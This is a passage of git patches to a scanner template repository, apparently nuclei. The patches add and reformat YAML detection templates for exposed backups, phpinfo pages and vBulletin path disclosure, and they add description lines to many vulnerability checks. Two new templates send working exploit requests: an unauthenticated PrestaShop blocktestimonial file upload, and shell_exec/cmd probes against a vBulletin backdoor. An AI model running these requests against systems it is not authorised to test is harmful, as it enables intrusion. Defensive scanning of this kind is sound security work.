4b0a00483046022100dd136554782498757934e378d6b3d17310b890f36927f0f207b88eea850bdae5022100e2b87ab11518d77bb41729df79da05c9c16a0606b5f23961e420dcb250fc9fed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index 9d285095bb..5461f75cf8 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -44,6 +44,7 @@ http: - /e/config/config.php # empirecms - /data/sql_config.php # phpwind - /data/bbscache/config.php # phpwind + - /app/config/parameters.yml #prestashop - /db.php - /conn.php - /database.php diff --git a/http/exposures/backups/sql-dump.yaml b/http/exposures/backups/sql-dump.yaml index 3f0c637b64..370c3cf743 100644 --- a/http/exposures/backups/sql-dump.yaml +++ b/http/exposures/backups/sql-dump.yaml @@ -2,7 +2,7 @@ id: default-sql-dump info: name: MySQL - Dump Files - author: geeknik,dwisiswant0,ELSFA7110 + author: geeknik,dwisiswant0,ELSFA7110,mastercho severity: medium description: A MySQL dump file was found classification: @@ -34,6 +34,7 @@ http: - "{{BaseURL}}/temp.sql" - "{{BaseURL}}/translate.sql" - "{{BaseURL}}/users.sql" + - "{{BaseURL}}/www.sql" - "{{BaseURL}}/wp-content/uploads/dump.sql" - "{{BaseURL}}/wp-content/mysql.sql" diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index add5e5e76a..68b6c29fbf 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -2,7 +2,7 @@ id: zip-backup-files info: name: Compressed Backup File - Detect - author: toufik-airane,dwisiswant0,ffffffff0x,pwnhxl + author: toufik-airane,dwisiswant0,ffffffff0x,pwnhxl,mastercho severity: medium description: Multiple compressed backup files were detected. classification: @@ -41,9 +41,19 @@ http: - "test" - "app" - "backup" + - "backup_1" + - "backup_2" + - "backup_3" + - "backup_4" + - "backups" - "bin" + - "temp" - "bak" - "old" + - "db" + - "sql" + - "dump" + - "database" - "Release" - "inetpub" EXT: @@ -57,8 +67,12 @@ http: - "xz" - "zip" - "z" + - "Z" - "tar.z" + - "tar" + - "tgz" - "db" + - "jar" - "sqlite" - "sqlitedb" - "sql.7z" diff --git a/http/exposures/configs/phpinfo-files.yaml b/http/exposures/configs/phpinfo-files.yaml index 79949c3c73..7caf883642 100644 --- a/http/exposures/configs/phpinfo-files.yaml +++ b/http/exposures/configs/phpinfo-files.yaml @@ -2,7 +2,7 @@ id: phpinfo-files info: name: PHPinfo Page - Detect - author: pdteam,daffainfo,meme-lord,dhiyaneshDK,wabafet + author: pdteam,daffainfo,meme-lord,dhiyaneshDK,wabafet,mastercho severity: low description: | PHPinfo page was detected. The output of the phpinfo() command can reveal sensitive and detailed PHP environment information. @@ -17,12 +17,15 @@ http: - method: GET path: - "{{BaseURL}}/php.php" + - "{{BaseURL}}/php2.php" - "{{BaseURL}}/phpinfo.php" - "{{BaseURL}}/info.php" - "{{BaseURL}}/infophp.php" - "{{BaseURL}}/php_info.php" - "{{BaseURL}}/test.php" - "{{BaseURL}}/i.php" + - "{{BaseURL}}/p.php" + - "{{BaseURL}}/pi.php" - "{{BaseURL}}/asdf.php" - "{{BaseURL}}/pinfo.php" - "{{BaseURL}}/phpversion.php" diff --git a/http/exposures/configs/vbulletin-fpd.yaml b/http/exposures/configs/vbulletin-fpd.yaml new file mode 100644 index 0000000000..ff8e3f4df3 --- /dev/null +++ b/http/exposures/configs/vbulletin-fpd.yaml @@ -0,0 +1,41 @@ +id: vbulletin-fpd + +info: + name: vBulletin - Full Path Disclosure (FPD) + author: MaStErChO + severity: info + reference: + - https://github.com/OWASP/vbscan/blob/master/modules/pathdisclure.pl + tags: config,exposure,fpd,vbulletin + +http: + - method: GET + path: + - "{{BaseURL}}/forumdisplay.php?do[]=[test.dll]" + - "{{BaseURL}}/calendar.php?do[]=[test.dll]" + - "{{BaseURL}}/search.php?do[]=[test.dll]" + - "{{BaseURL}}/forumrunner/include/album.php" + - "{{BaseURL}}/core/vb5/route/channel.php" + - "{{BaseURL}}/core/vb5/route/conversation.php" + - "{{BaseURL}}/includes/api/interface/noncollapsed.php" + - "{{BaseURL}}/includes/api/interface/collapsed.php" + - "{{BaseURL}}/vbseo_sitemap/addons/vbseo_sm_vba.php" + - "{{BaseURL}}/vbseo_sitemap/addons/vbseo_sm_vba_links.php" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cannot modify header information" + - "trim()" + - "class_core.php" + - "header already sent" + - "Fatal error" + condition: or + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/prestashop/blocktestimonial-file-upload.yaml b/http/vulnerabilities/prestashop/blocktestimonial-file-upload.yaml new file mode 100644 index 0000000000..5d255bb5db --- /dev/null +++ b/http/vulnerabilities/prestashop/blocktestimonial-file-upload.yaml @@ -0,0 +1,65 @@ +id: prestashop-blocktestimonial-modules-file-upload + +info: + name: Prestashop Blocktestimonial Modules File Upload + author: MaStErChO + severity: critical + reference: + - https://3xploit7.blogspot.com/2016/12/pretashop-blocktestimonial-upload-shell.html + - https://github.com/indoxploit-coders/blocktestimonial-file-upload + - https://exploit.linuxsec.org/prestashop-module-blocktestimonial-file-upload-auto-exploit + metadata: + framework: prestashop + shodan-query: http.component:"prestashop" + tags: intrusive,file-upload,php,prestashop +variables: + filename: '{{rand_base(7, "abc")}}' +http: + - raw: + - | + POST /modules/blocktestimonial/addtestimonial.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLSo7Btb6nGcpR9Cl + + ------WebKitFormBoundaryLSo7Btb6nGcpR9Cl + Content-Disposition: form-data; name="testimonial_submitter_name" + + nuclei + ------WebKitFormBoundaryLSo7Btb6nGcpR9Cl + Content-Disposition: form-data; name="testimonial_title" + + tested by nuclei + ------WebKitFormBoundaryLSo7Btb6nGcpR9Cl + Content-Disposition: form-data; name="testimonial_main_message" + + tested by nuclei + ------WebKitFormBoundaryLSo7Btb6nGcpR9Cl + Content-Disposition: form-data; name="testimonial_img"; filename="{{filename}}.html" + Content-Type: text/html + + <html> + <body> + <h1>Nuclei Check</h1> + </body> + </html> + + ------WebKitFormBoundaryLSo7Btb6nGcpR9Cl + Content-Disposition: form-data; name="testimonial" + + Submit Testimonial + ------WebKitFormBoundaryLSo7Btb6nGcpR9Cl-- + + - | + GET /upload/{{filename}}.html HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + words: + - "Your testimonial was submitted successfully." + part: body_1 + - type: word + words: + - "<h1>Nuclei Check</h1>" + part: body_2 \ No newline at end of file diff --git a/http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml b/http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml new file mode 100644 index 0000000000..bc27f67e52 --- /dev/null +++ b/http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml @@ -0,0 +1,44 @@ +id: vbulletin-backdoor + +info: + name: vBulletin Backdoor - Detect + author: MaStErCho + severity: high + reference: + - https://github.com/OWASP/vbscan + - https://blog.sucuri.net/2017/01/vbulletin-malware-hackers-compete-backdoor-control.html + tags: backdoor,php,vbulletin,rce +variables: + num: "999999999" + +http: + - method: GET + path: + - '{{BaseURL}}/faq.php?cmd=echo%20"{{num}}"' + - '{{BaseURL}}/forum.php?x=shell_exec&y=echo%20"{{num}}"' + - '{{BaseURL}}/{{paths}}/faq.php?cmd=echo%20"{{num}}"' + - '{{BaseURL}}/{{paths}}/forum.php?x=shell_exec&y=echo%20"{{num}}"' + - '{{paths}}.{{BaseURL}}/faq.php?cmd=echo%20"{{num}}"' + - '{{paths}}.{{BaseURL}}/forum.php?x=shell_exec&y=echo%20"{{num}}"' + + payloads: + paths: + - 'boards' + - 'board' + - 'forum' + - 'forums' + - 'vb' + + stop-at-first-match: true + host-redirects: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + condition: and + words: + - "{{num}}" + + - type: status + status: + - 200 \ No newline at end of file From a1919576ed0fe86c2a55820dc89c7079ae9bd369 Mon Sep 17 00:00:00 2001 From: mastercho <souljanboy@gmail.com> Date: Sun, 31 Dec 2023 18:34:01 +0200 Subject: [PATCH 004/285] Formatin yaml --- http/cves/2023/CVE-2023-27639.yaml | 2 +- http/cves/2023/CVE-2023-27640.yaml | 4 ++-- http/exposures/backups/php-backup-files.yaml | 2 +- http/exposures/configs/vbulletin-fpd.yaml | 2 +- .../prestashop/blocktestimonial-file-upload.yaml | 4 ++-- 5 files changed, 7 insertions(+), 7 deletions(-) diff --git a/http/cves/2023/CVE-2023-27639.yaml b/http/cves/2023/CVE-2023-27639.yaml index 5ab758afde..d0d4f53865 100644 --- a/http/cves/2023/CVE-2023-27639.yaml +++ b/http/cves/2023/CVE-2023-27639.yaml @@ -17,7 +17,7 @@ info: http: - method: POST path: - - "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg" + - "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg" body: "url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php" headers: Content-Type: application/x-www-form-urlencoded diff --git a/http/cves/2023/CVE-2023-27640.yaml b/http/cves/2023/CVE-2023-27640.yaml index 55e53be3a1..2956885fb5 100644 --- a/http/cves/2023/CVE-2023-27640.yaml +++ b/http/cves/2023/CVE-2023-27640.yaml @@ -21,9 +21,9 @@ http: matchers-condition: and matchers: - - type: dsl + - type: dsl dsl: - contains(base64_decode(body), "PrestaShop") - - type: dsl + - type: dsl dsl: - contains(base64_decode(body), "?php") \ No newline at end of file diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index 5461f75cf8..c16eac1f02 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -44,7 +44,7 @@ http: - /e/config/config.php # empirecms - /data/sql_config.php # phpwind - /data/bbscache/config.php # phpwind - - /app/config/parameters.yml #prestashop + - /app/config/parameters.yml # prestashop - /db.php - /conn.php - /database.php diff --git a/http/exposures/configs/vbulletin-fpd.yaml b/http/exposures/configs/vbulletin-fpd.yaml index ff8e3f4df3..4876cc4b6f 100644 --- a/http/exposures/configs/vbulletin-fpd.yaml +++ b/http/exposures/configs/vbulletin-fpd.yaml @@ -33,7 +33,7 @@ http: - "trim()" - "class_core.php" - "header already sent" - - "Fatal error" + - "Fatal error" condition: or - type: status diff --git a/http/vulnerabilities/prestashop/blocktestimonial-file-upload.yaml b/http/vulnerabilities/prestashop/blocktestimonial-file-upload.yaml index 5d255bb5db..467a12657d 100644 --- a/http/vulnerabilities/prestashop/blocktestimonial-file-upload.yaml +++ b/http/vulnerabilities/prestashop/blocktestimonial-file-upload.yaml @@ -48,11 +48,11 @@ http: Submit Testimonial ------WebKitFormBoundaryLSo7Btb6nGcpR9Cl-- - + - | GET /upload/{{filename}}.html HTTP/1.1 Host: {{Hostname}} - + matchers-condition: and matchers: - type: word From d9e2ee78ee5744e473eb7ef69a637309043aa9b1 Mon Sep 17 00:00:00 2001 From: mastercho <souljanboy@gmail.com> Date: Sun, 31 Dec 2023 18:39:40 +0200 Subject: [PATCH 005/285] Formatin yaml second time --- http/cves/2023/CVE-2023-27639.yaml | 6 +++--- http/cves/2023/CVE-2023-27640.yaml | 6 +++--- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/http/cves/2023/CVE-2023-27639.yaml b/http/cves/2023/CVE-2023-27639.yaml index d0d4f53865..e0ffc1b9ff 100644 --- a/http/cves/2023/CVE-2023-27639.yaml +++ b/http/cves/2023/CVE-2023-27639.yaml @@ -17,12 +17,12 @@ info: http: - method: POST path: - - "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg" + - "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg" body: "url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php" headers: Content-Type: application/x-www-form-urlencoded - - matchers-condition: and + + matchers-condition: and matchers: - type: word words: diff --git a/http/cves/2023/CVE-2023-27640.yaml b/http/cves/2023/CVE-2023-27640.yaml index 2956885fb5..fe2b57cd70 100644 --- a/http/cves/2023/CVE-2023-27640.yaml +++ b/http/cves/2023/CVE-2023-27640.yaml @@ -18,12 +18,12 @@ http: - method: GET path: - "{{BaseURL}}/tshirtecommerce/fonts.php?name=2&type=./../index.php" - + matchers-condition: and matchers: - - type: dsl + - type: dsl dsl: - contains(base64_decode(body), "PrestaShop") - - type: dsl + - type: dsl dsl: - contains(base64_decode(body), "?php") \ No newline at end of file From 09731013ce0e0c2265a0b2c31b07e797ccae1788 Mon Sep 17 00:00:00 2001 From: mastercho <souljanboy@gmail.com> Date: Tue, 2 Jan 2024 03:07:48 +0200 Subject: [PATCH 006/285] added other config of presta --- http/exposures/backups/php-backup-files.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index c16eac1f02..d7d6b72ad5 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -45,6 +45,7 @@ http: - /data/sql_config.php # phpwind - /data/bbscache/config.php # phpwind - /app/config/parameters.yml # prestashop + - /app/config/parameters.php # prestashop - /db.php - /conn.php - /database.php From 440c82a4dbc1f26cac8ab1df92e2878ee13e4f65 Mon Sep 17 00:00:00 2001 From: Vikas Gupta <vikasgupta@ip-192-168-29-225.ec2.internal> Date: Tue, 2 Jan 2024 21:15:12 +0530 Subject: [PATCH 007/285] Updated descriptions of templates --- http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 1 + http/vulnerabilities/apache/apache-solr-rce.yaml | 1 + http/vulnerabilities/cisco/cucm-username-enumeration.yaml | 1 + http/vulnerabilities/dahua/dahua-wpms-lfi.yaml | 1 + http/vulnerabilities/dahua/dahua-wpms-rce.yaml | 1 + http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml | 1 + http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml | 1 + .../vulnerabilities/finereport/fine-report-v9-file-upload.yaml | 1 + http/vulnerabilities/generic/cache-poisoning-xss.yaml | 1 + http/vulnerabilities/generic/cache-poisoning.yaml | 1 + http/vulnerabilities/generic/generic-blind-xxe.yaml | 1 + http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml | 1 + http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml | 1 + http/vulnerabilities/huawei/huawei-firewall-lfi.yaml | 1 + http/vulnerabilities/jamf/jamf-blind-xxe.yaml | 1 + http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml | 1 + http/vulnerabilities/microsoft/office-webapps-ssrf.yaml | 1 + http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml | 1 + http/vulnerabilities/oracle/oracle-ebs-xss.yaml | 1 + http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml | 1 + http/vulnerabilities/other/apache-druid-log4j.yaml | 1 + http/vulnerabilities/other/cacti-weathermap-file-write.yaml | 1 + http/vulnerabilities/other/crawlab-lfi.yaml | 1 + http/vulnerabilities/other/digital-ocean-ssrf.yaml | 1 + http/vulnerabilities/other/easyimage-downphp-lfi.yaml | 1 + http/vulnerabilities/other/gloo-unauth.yaml | 1 + http/vulnerabilities/other/hanta-rce.yaml | 1 + http/vulnerabilities/other/hasura-graphql-ssrf.yaml | 3 ++- http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml | 1 + http/vulnerabilities/other/kiwitcms-json-rpc.yaml | 1 + http/vulnerabilities/other/phpldapadmin-xss.yaml | 1 + http/vulnerabilities/other/pyspider-unauthorized-access.yaml | 1 + http/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml | 1 + http/vulnerabilities/other/resin-cnnvd-200705-315.yaml | 1 + http/vulnerabilities/other/sangfor-cphp-rce.yaml | 1 + http/vulnerabilities/other/sitemap-sql-injection.yaml | 1 + http/vulnerabilities/other/spark-webui-unauth.yaml | 1 + http/vulnerabilities/other/sslvpn-client-rce.yaml | 1 + http/vulnerabilities/other/tamronos-user-creation.yaml | 1 + http/vulnerabilities/other/tianqing-info-leak.yaml | 1 + http/vulnerabilities/other/webpagetest-ssrf.yaml | 1 + http/vulnerabilities/other/yibao-sqli.yaml | 1 + http/vulnerabilities/qibocms-file-download.yaml | 1 + http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml | 1 + http/vulnerabilities/splash/splash-render-ssrf.yaml | 1 + http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml | 1 + http/vulnerabilities/tongda/tongda-session-disclosure.yaml | 1 + http/vulnerabilities/vmware/vmware-cloud-xss.yaml | 1 + http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml | 1 + .../weaver/weaver-lazyuploadify-file-upload.yaml | 1 + http/vulnerabilities/weaver/weaver-login-sessionkey.yaml | 1 + http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml | 1 + http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml | 1 + .../vulnerabilities/wordpress/wordpress-db-backup-listing.yaml | 1 + http/vulnerabilities/wordpress/wordpress-db-backup.yaml | 1 + http/vulnerabilities/wordpress/wordpress-debug-log.yaml | 1 + .../vulnerabilities/wordpress/wordpress-directory-listing.yaml | 1 + http/vulnerabilities/wordpress/wordpress-emergency-script.yaml | 1 + http/vulnerabilities/wordpress/wordpress-installer-log.yaml | 1 + http/vulnerabilities/wordpress/wordpress-rdf-user-enum.yaml | 1 + http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml | 1 + .../wordpress/wordpress-total-upkeep-backup-download.yaml | 1 + .../wordpress/wordpress-updraftplus-pem-key.yaml | 1 + http/vulnerabilities/wordpress/wordpress-user-enum.yaml | 1 + http/vulnerabilities/wordpress/wp-config-setup.yaml | 1 + http/vulnerabilities/wordpress/wp-full-path-disclosure.yaml | 1 + http/vulnerabilities/wordpress/wp-haberadam-idor.yaml | 1 + http/vulnerabilities/wordpress/wp-license-file.yaml | 1 + .../wordpress/wp-xmlrpc-pingback-detection.yaml | 1 + http/vulnerabilities/wordpress/wpdm-cache-session.yaml | 1 + http/vulnerabilities/wordpress/wpmudev-pub-keys.yaml | 1 + http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml | 1 + http/vulnerabilities/zzzcms/zzzcms-xss.yaml | 1 + 73 files changed, 74 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml index 823af7ec46..a6682de0b1 100644 --- a/http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml +++ b/http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml @@ -4,6 +4,7 @@ info: name: Amazon EC2 - Server-side request forgery (SSRF) author: DhiyaneshDk severity: critical + description: SSRF vulnerability exists in Amazon EC2, or Amazon Elastic Compute Cloud which is a web service provided by Amazon Web Services (AWS) that offers resizable compute capacity in the cloud. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 diff --git a/http/vulnerabilities/apache/apache-solr-rce.yaml b/http/vulnerabilities/apache/apache-solr-rce.yaml index 4ce51d4494..10b2bfb177 100644 --- a/http/vulnerabilities/apache/apache-solr-rce.yaml +++ b/http/vulnerabilities/apache/apache-solr-rce.yaml @@ -4,6 +4,7 @@ info: name: Apache Solr 9.1 - Remote Code Execution author: j4vaovo severity: critical + description: Apache Solr 9.1 is vulnerable to RCE. reference: - https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/ metadata: diff --git a/http/vulnerabilities/cisco/cucm-username-enumeration.yaml b/http/vulnerabilities/cisco/cucm-username-enumeration.yaml index b398d252eb..8f14bf3ce0 100644 --- a/http/vulnerabilities/cisco/cucm-username-enumeration.yaml +++ b/http/vulnerabilities/cisco/cucm-username-enumeration.yaml @@ -4,6 +4,7 @@ info: name: Cisco Unified Call Manager Username Enumeration author: manasmbellani severity: medium + description: Cisco Unified Call Manager is vulnerable to username enumeration. remediation: To mitigate this, enable Contact Search Authentication. reference: - https://www.n00py.io/2022/01/unauthenticated-dumping-of-usernames-via-cisco-unified-call-manager-cucm/ diff --git a/http/vulnerabilities/dahua/dahua-wpms-lfi.yaml b/http/vulnerabilities/dahua/dahua-wpms-lfi.yaml index bc324a1e75..5fd3d93022 100644 --- a/http/vulnerabilities/dahua/dahua-wpms-lfi.yaml +++ b/http/vulnerabilities/dahua/dahua-wpms-lfi.yaml @@ -4,6 +4,7 @@ info: name: Dahua Smart Park Management Platform - Arbitary File Read author: DhiyaneshDk severity: high + description: Dahua Smart Park Management Platform is vulnerable to Local File Inclusion. reference: - https://mp.weixin.qq.com/s/uRhVl2XC5fTNKO8eDFFebA - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/dahua_zhyq_attachment_fileread.py diff --git a/http/vulnerabilities/dahua/dahua-wpms-rce.yaml b/http/vulnerabilities/dahua/dahua-wpms-rce.yaml index 75cbd7b930..3f5f79ec2c 100644 --- a/http/vulnerabilities/dahua/dahua-wpms-rce.yaml +++ b/http/vulnerabilities/dahua/dahua-wpms-rce.yaml @@ -4,6 +4,7 @@ info: name: Dahua Smart Park Integrated Management Platform - Remote Command Execution author: DhiyaneshDK severity: critical + description: Dahua Smart Park Integrated Management Platform is vulnerable to RCE. reference: - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/dahua-zhyq-deleteftp-rce.py metadata: diff --git a/http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml b/http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml index 2ab1808884..dcf9942b4e 100644 --- a/http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml +++ b/http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml @@ -4,6 +4,7 @@ info: name: Node ecstatic Internal Path - Exposure author: DhiyaneshDK severity: low + description: Internal path exposure in Node ecstatic. reference: - https://tripla.dk/2020/03/26/multiple-vulnerabilities-in-nodejs-ecstatic-http-server-http-party/ metadata: diff --git a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml index 281815a1d9..f695778d8b 100644 --- a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml +++ b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml @@ -4,6 +4,7 @@ info: name: Node ecstatic Directory Listing author: DhiyaneshDK severity: low + description: Directiory listing enabled in Node ecstatic. reference: - https://tripla.dk/2020/03/26/multiple-vulnerabilities-in-nodejs-ecstatic-http-server-http-party/ metadata: diff --git a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml index d36899857a..f2e20764a9 100644 --- a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml +++ b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml @@ -4,6 +4,7 @@ info: name: FineReport v9 Arbitrary File Overwrite author: SleepingBag945 severity: critical + description: FineReport ( A business intelligence (BI) and reporting software ) is vulnerable to Arbitrary File Overwrite. reference: - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp. metadata: diff --git a/http/vulnerabilities/generic/cache-poisoning-xss.yaml b/http/vulnerabilities/generic/cache-poisoning-xss.yaml index a31fbfbd1d..71f8ca3fea 100644 --- a/http/vulnerabilities/generic/cache-poisoning-xss.yaml +++ b/http/vulnerabilities/generic/cache-poisoning-xss.yaml @@ -4,6 +4,7 @@ info: name: Cache Poisoning - Stored XSS author: melbadry9,xelkomy,akincibor severity: high + description: Cache Poisoning leads to Stored XSS. reference: - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning - https://portswigger.net/research/practical-web-cache-poisoning diff --git a/http/vulnerabilities/generic/cache-poisoning.yaml b/http/vulnerabilities/generic/cache-poisoning.yaml index 1ee23192d3..3b569e1373 100644 --- a/http/vulnerabilities/generic/cache-poisoning.yaml +++ b/http/vulnerabilities/generic/cache-poisoning.yaml @@ -4,6 +4,7 @@ info: name: Cache Poisoning Detection author: melbadry9,xelkomy,akincibor,dogasantos severity: low + description: This template detects Cache poisoning. reference: - https://web.archive.org/web/20210422000653/https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning - https://portswigger.net/research/practical-web-cache-poisoning diff --git a/http/vulnerabilities/generic/generic-blind-xxe.yaml b/http/vulnerabilities/generic/generic-blind-xxe.yaml index c0f167778a..c89a3836f3 100644 --- a/http/vulnerabilities/generic/generic-blind-xxe.yaml +++ b/http/vulnerabilities/generic/generic-blind-xxe.yaml @@ -4,6 +4,7 @@ info: name: Generic Blind XXE author: geeknik severity: high + description: This template detects Generic Blind XXE. metadata: max-request: 1 tags: xxe,generic,blind diff --git a/http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml b/http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml index 23cffa6b4d..384398d519 100644 --- a/http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml +++ b/http/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml @@ -4,6 +4,7 @@ info: name: XMLRPC Pingback SSRF author: geeknik severity: high + description: XMLRPC Pingback leads to SSRF. reference: - https://hackerone.com/reports/406387 metadata: diff --git a/http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml b/http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml index e90fb378f0..04fc350428 100644 --- a/http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml +++ b/http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml @@ -4,6 +4,7 @@ info: name: Huawei Auth Http Server - Arbitrary File Read author: DhiyaneshDk severity: high + description: Huawei Auth HTTP Server is vulnerable to Arbitrary File Read. reference: - https://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247498499&idx=1&sn=6850c3e9a3df795e48ba9a10c9772ddd - https://github.com/Vme18000yuan/FreePOC/blob/master/poc/pocsuite/huawei-auth-http-readfile.py diff --git a/http/vulnerabilities/huawei/huawei-firewall-lfi.yaml b/http/vulnerabilities/huawei/huawei-firewall-lfi.yaml index bc952c0719..d089e9a99e 100644 --- a/http/vulnerabilities/huawei/huawei-firewall-lfi.yaml +++ b/http/vulnerabilities/huawei/huawei-firewall-lfi.yaml @@ -4,6 +4,7 @@ info: name: Huawei Firewall - Local File Inclusion author: taielab severity: high + description: Huawei Firewall is vulnerable to LFI(Local File Inclusion) classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 diff --git a/http/vulnerabilities/jamf/jamf-blind-xxe.yaml b/http/vulnerabilities/jamf/jamf-blind-xxe.yaml index f4ff3b060b..2570e3466f 100644 --- a/http/vulnerabilities/jamf/jamf-blind-xxe.yaml +++ b/http/vulnerabilities/jamf/jamf-blind-xxe.yaml @@ -4,6 +4,7 @@ info: name: JAMF Blind XXE / SSRF author: pdteam severity: medium + description: Blind XXE / SSRF exists in JAMF which is a company that provides enterprise-level software solutions for managing and securing Apple devices in organizations. reference: - https://www.synack.com/blog/a-deep-dive-into-xxe-injection/ metadata: diff --git a/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml b/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml index 6461e48741..32e38f67ff 100644 --- a/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml +++ b/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml @@ -4,6 +4,7 @@ info: name: Unauthenticated Jenkins Dashboard author: dhiyaneshDK severity: high + description: Jenkins Dashboard is exposed to external users. metadata: max-request: 1 tags: jenkins diff --git a/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml b/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml index 85231b0f37..cbbb08c105 100644 --- a/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml +++ b/http/vulnerabilities/microsoft/office-webapps-ssrf.yaml @@ -4,6 +4,7 @@ info: name: Office Web Apps Server Full Read - Server Side Request Forgery author: DhiyaneshDK severity: high + description: Office Web Apps Server Full Read is vulnerable to SSRF. reference: - https://drive.google.com/file/d/1aeNq_5wVwHRR1np1jIRQM1hocrgcZ6Qu/view (Slide 37,38) metadata: diff --git a/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml index 6e60edc502..36d2658f0a 100644 --- a/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml +++ b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml @@ -4,6 +4,7 @@ info: name: Semi Arbitrary File Read in Dev Mode - Nuxt.js author: DhiyaneshDK severity: medium + description: Arbitrary File Read in Dev Mode in Nuxt.js reference: - https://huntr.dev/bounties/7840cd32-af15-40cb-a148-7ef3dff4a0c2/ - https://bryces.io/blog/nuxt3 diff --git a/http/vulnerabilities/oracle/oracle-ebs-xss.yaml b/http/vulnerabilities/oracle/oracle-ebs-xss.yaml index bddbce8ac9..8511436777 100644 --- a/http/vulnerabilities/oracle/oracle-ebs-xss.yaml +++ b/http/vulnerabilities/oracle/oracle-ebs-xss.yaml @@ -4,6 +4,7 @@ info: name: Oracle E-Business Suite - Cross-Site Scripting author: dhiyaneshDk severity: medium + description: Oracle E-Business Suite is vulnerable to Cross Site Scripting. reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf diff --git 